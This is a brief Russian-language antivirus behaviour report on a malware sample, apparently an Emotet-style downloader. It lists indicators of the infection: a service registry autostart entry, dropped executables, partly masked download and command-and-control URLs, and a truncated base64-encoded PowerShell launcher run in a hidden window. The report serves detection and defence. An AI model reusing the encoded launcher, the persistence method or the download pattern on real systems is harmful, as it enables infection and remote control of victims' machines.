Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\ACCTRES] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\ACCTRES] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDBHC\ACCTRES.exe"'
- 'ACCTRES' "%WINDIR%\SysWOW64\KBDBHC\ACCTRES.exe"
- 'ACCTRES' %WINDIR%\SysWOW64\KBDBHC\ACCTRES.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAGsANgBrAHUAMAB5AD0AKAAoACcAVgA2AGYAJwArACcANwBjACcAKQArACcAdAAwACcAKQA7ACYAKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUAbgBWADoAdABlAG0AUABcAFcATwBSAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...
- %TEMP%\word\2019\sbvzhvg.exe
- %WINDIR%\syswow64\kbdbhc\acctres.exe
- %TEMP%\word\2019\sbvzhvg.exe в %WINDIR%\syswow64\kbdbhc\acctres.exe
- '11#.#10.236.121':8080
- http://le###.pri.ee/melius/tv471975685/
- http://me###opoly.com/cgi-bin/Krt1152299/
- http://11#.###.236.121:8080/dMqdWALmPT0a0LZ/kHGnmdWtl1/ via 11#.#10.236.121
- DNS ASK le###.pri.ee
- DNS ASK me###opoly.com
- '%TEMP%\word\2019\sbvzhvg.exe'
- '%WINDIR%\syswow64\kbdbhc\acctres.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAGsANgBrAHUAMAB5AD0AKAAoACcAVgA2AGYAJwArACcANwBjACcAKQArACcAdAAwACcAKQA7ACYAKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUAbgBWADoAdABlAG0AUABcAFcATwBSAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...' (со скрытым окном)